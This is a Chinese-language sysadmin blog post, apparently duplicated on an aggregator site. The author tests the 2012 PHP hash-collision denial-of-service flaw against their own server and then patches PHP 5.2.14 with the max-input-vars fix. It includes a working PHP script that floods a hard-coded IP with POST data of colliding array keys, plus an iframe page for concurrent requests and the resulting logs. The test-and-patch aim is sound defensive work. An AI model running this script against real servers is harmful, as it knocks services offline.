php hash漏洞测试及补丁
2012-01-07 08:26
666 查看
PHP hash漏洞测试环境:
Ip:xx.xx.31.167 Nginx0.8+php5.2.14 4颗CPU 。
一、未打补丁前:
# curl --head http://127.0.0.1 HTTP/1.1 200 OK
Server: nginx
Date: Fri, 06 Jan 2012 06:10:09 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.14 php5.2.14版本,负载0
测试攻击代码:
链接下载地址:http://www.linuxso.com/linuxbiancheng/15500.html
1) dos.php脚本 pow(2,15)是构架hash碰撞的post数据data
<?php
$size = pow(2, 16);
$array = array();
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://115.238.31.167/test.php");
for ($key = 0, $maxKey = ($size - 1) * $size; $key <= $maxKey; $key += $size) {
#$array[$key] = 0;
$argument.="a[".$key."]=0&";
}
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $argument."1=1");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_TIMEOUT, '0');
curl_setopt($ch, CURLOPT_USERAGENT, 'API REQUEST(CURL)');
$return['result'] = curl_exec($ch);
$return['code'] = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
?>
测试单个并发连接http://xx.xx.31.167/dos.php?a=.1. 结果单个php-cgi进程,单个CPU占100%。
如开两个窗口并发连接,则两个PHP进程,两个CPU 都占满100%。
2) ddos.php 脚本 php模拟post提交数据
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<title>DDOS</title>
</head>
<body>
<?php
for($i=0; $i<5; $i++){//并发数
echo '<iframe src=\'#\'" scrolling="false" frameborder="1" allowtransparency="true" style="background-color:transparent;"></iframe>';
}
?>
</body>
</html>
http://xx.xx.31.167/ddos.php 访问测试结果:
[align=left] [/align]
xx.xx.31.167 - - [06/Jan/2012:14:04:27 +0800] "POST /test.php HTTP/1.1" 502 191 "-" "API REQUEST(CURL)" "-"
xx.xx.194.180 - - [06/Jan/2012:14:04:27 +0800] "GET /test2.php HTTP/1.1" 200 31 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.17) Gecko/20110420 Firefox/3.6.17" "-"
xx.xx.31.167 - - [06/Jan/2012:14:05:26 +0800] "POST /test.php HTTP/1.1" 502 191 "-" "API REQUEST(CURL)" "-"
xx.xx.194.180 - - [06/Jan/2012:14:05:26 +0800] "GET /test2.php HTTP/1.1" 200 31 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.17) Gecko/20110420 Firefox/3.6.17" "-"
php模拟post提交,CPU瞬间全占满100%.
二、打补丁
[align=left]1.补丁下载地址(打入前先备份相关php配置文件):https://github.com/laruence/laruence.github.com/tree/master/php-5.2-max-input-vars[/align]
[align=left]2.具体操作:[/align]
#/usr/local/php/sbin/php-fpm stop 停止php服务
# cd /tmp/php-5.2.14 进入源码目录
# patch -p1 < ../php-5.2.14-max-input-vars.patch 打入补丁包
#./configure --prefix=/usr/local/php --with-config-file-path=/usr/local/php/etc --with-mysql=/usr/local/mysql --with-mysqli=/usr/local/mysql/bin/mysql_config --with-iconv-dir=/usr/local --with-freetype-dir --with-jpeg-dir --with-png-dir --with-zlib --with-libxml-dir=/usr --enable-xml --disable-rpath --enable-discard-path --enable-safe-mode --enable-bcmath --enable-shmop --enable-sysvsem --enable-inline-optimization --with-curl --with-curlwrappers --enable-mbregex --enable-fastcgi --enable-fpm --enable-force-cgi-redirect --enable-mbstring --with-gd --enable-gd-native-ttf --with-mcrypt --with-openssl --with-mhash --enable-sockets --enable-pcntl --with-xmlrpc --enable-zip --enable-soap 重新编译
#make clean
#make ZEND_EXTRA_LIBS='-liconv'
#make install
查看配置文件是否被覆盖安装。开启php-fpm服务
# curl --head http://127.0.0.1
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 06 Jan 2012 08:05:38 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.14p1 补丁已打上5.2.14p1
再次php hash攻击测试:
访问http://xx.xx.31.167/ddos.php
很强大,已无影响.
本文出自 “E人空间” 博客,请务必保留此出处http://iceeggplant.blog.51cto.com/1446843/759523
Ip:xx.xx.31.167 Nginx0.8+php5.2.14 4颗CPU 。
一、未打补丁前:
# curl --head http://127.0.0.1 HTTP/1.1 200 OK
Server: nginx
Date: Fri, 06 Jan 2012 06:10:09 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.14 php5.2.14版本,负载0
测试攻击代码:
链接下载地址:http://www.linuxso.com/linuxbiancheng/15500.html
1) dos.php脚本 pow(2,15)是构架hash碰撞的post数据data
<?php
$size = pow(2, 16);
$array = array();
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://115.238.31.167/test.php");
for ($key = 0, $maxKey = ($size - 1) * $size; $key <= $maxKey; $key += $size) {
#$array[$key] = 0;
$argument.="a[".$key."]=0&";
}
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $argument."1=1");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_TIMEOUT, '0');
curl_setopt($ch, CURLOPT_USERAGENT, 'API REQUEST(CURL)');
$return['result'] = curl_exec($ch);
$return['code'] = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
?>
测试单个并发连接http://xx.xx.31.167/dos.php?a=.1. 结果单个php-cgi进程,单个CPU占100%。
如开两个窗口并发连接,则两个PHP进程,两个CPU 都占满100%。
2) ddos.php 脚本 php模拟post提交数据
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<title>DDOS</title>
</head>
<body>
<?php
for($i=0; $i<5; $i++){//并发数
echo '<iframe src=\'#\'" scrolling="false" frameborder="1" allowtransparency="true" style="background-color:transparent;"></iframe>';
}
?>
</body>
</html>
http://xx.xx.31.167/ddos.php 访问测试结果:
[align=left] [/align]
xx.xx.31.167 - - [06/Jan/2012:14:04:27 +0800] "POST /test.php HTTP/1.1" 502 191 "-" "API REQUEST(CURL)" "-"
xx.xx.194.180 - - [06/Jan/2012:14:04:27 +0800] "GET /test2.php HTTP/1.1" 200 31 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.17) Gecko/20110420 Firefox/3.6.17" "-"
xx.xx.31.167 - - [06/Jan/2012:14:05:26 +0800] "POST /test.php HTTP/1.1" 502 191 "-" "API REQUEST(CURL)" "-"
xx.xx.194.180 - - [06/Jan/2012:14:05:26 +0800] "GET /test2.php HTTP/1.1" 200 31 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.17) Gecko/20110420 Firefox/3.6.17" "-"
php模拟post提交,CPU瞬间全占满100%.
二、打补丁
[align=left]1.补丁下载地址(打入前先备份相关php配置文件):https://github.com/laruence/laruence.github.com/tree/master/php-5.2-max-input-vars[/align]
[align=left]2.具体操作:[/align]
#/usr/local/php/sbin/php-fpm stop 停止php服务
# cd /tmp/php-5.2.14 进入源码目录
# patch -p1 < ../php-5.2.14-max-input-vars.patch 打入补丁包
#./configure --prefix=/usr/local/php --with-config-file-path=/usr/local/php/etc --with-mysql=/usr/local/mysql --with-mysqli=/usr/local/mysql/bin/mysql_config --with-iconv-dir=/usr/local --with-freetype-dir --with-jpeg-dir --with-png-dir --with-zlib --with-libxml-dir=/usr --enable-xml --disable-rpath --enable-discard-path --enable-safe-mode --enable-bcmath --enable-shmop --enable-sysvsem --enable-inline-optimization --with-curl --with-curlwrappers --enable-mbregex --enable-fastcgi --enable-fpm --enable-force-cgi-redirect --enable-mbstring --with-gd --enable-gd-native-ttf --with-mcrypt --with-openssl --with-mhash --enable-sockets --enable-pcntl --with-xmlrpc --enable-zip --enable-soap 重新编译
#make clean
#make ZEND_EXTRA_LIBS='-liconv'
#make install
查看配置文件是否被覆盖安装。开启php-fpm服务
# curl --head http://127.0.0.1
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 06 Jan 2012 08:05:38 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.14p1 补丁已打上5.2.14p1
再次php hash攻击测试:
访问http://xx.xx.31.167/ddos.php
很强大,已无影响.
本文出自 “E人空间” 博客,请务必保留此出处http://iceeggplant.blog.51cto.com/1446843/759523
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 
相关文章推荐
- php hash 漏洞手动打补丁指南
- PHP多线程版本HASH漏洞攻击工具
- PHP博客程序C-blog2.0漏洞测试大揭密(图)
- PHP多线程版本HASH漏洞攻击工具
- PHP的hash漏洞解决方案
- php检查漏洞防护补丁-防护XSS,SQL,文件包含等多种高危漏洞
- 使用 Docker 测试 PHP CVE-2018-5711 漏洞
- 通过PHP的hash冲突漏洞进行DDoS攻击
- PHP+MYSQL 【注入漏洞】攻防测试
- 2017-10271weblogic漏洞exp测试及补丁测试
- PHP利用hash冲突漏洞进行DDoS攻击的方法分析
- 修复php-5.2.* hash漏洞
- PHP hash表hash分布测试
- phpliteadmin <= 1.9.3 远程php代码执行漏洞测试
- Ubuntu发布PHP重要补丁修复多个PHP漏洞
- 通过PHP的hash冲突漏洞进行DDoS攻击
- php一致性hash性能测试(flexihash/memcache/memcached)
- 关于php-5.2.x和php-5.3.x hash dos 漏洞攻击与修复
- 通过PHP的hash冲突漏洞进行DDoS攻击
- 通过PHP的hash冲突漏洞进行DDoS攻击的解决办法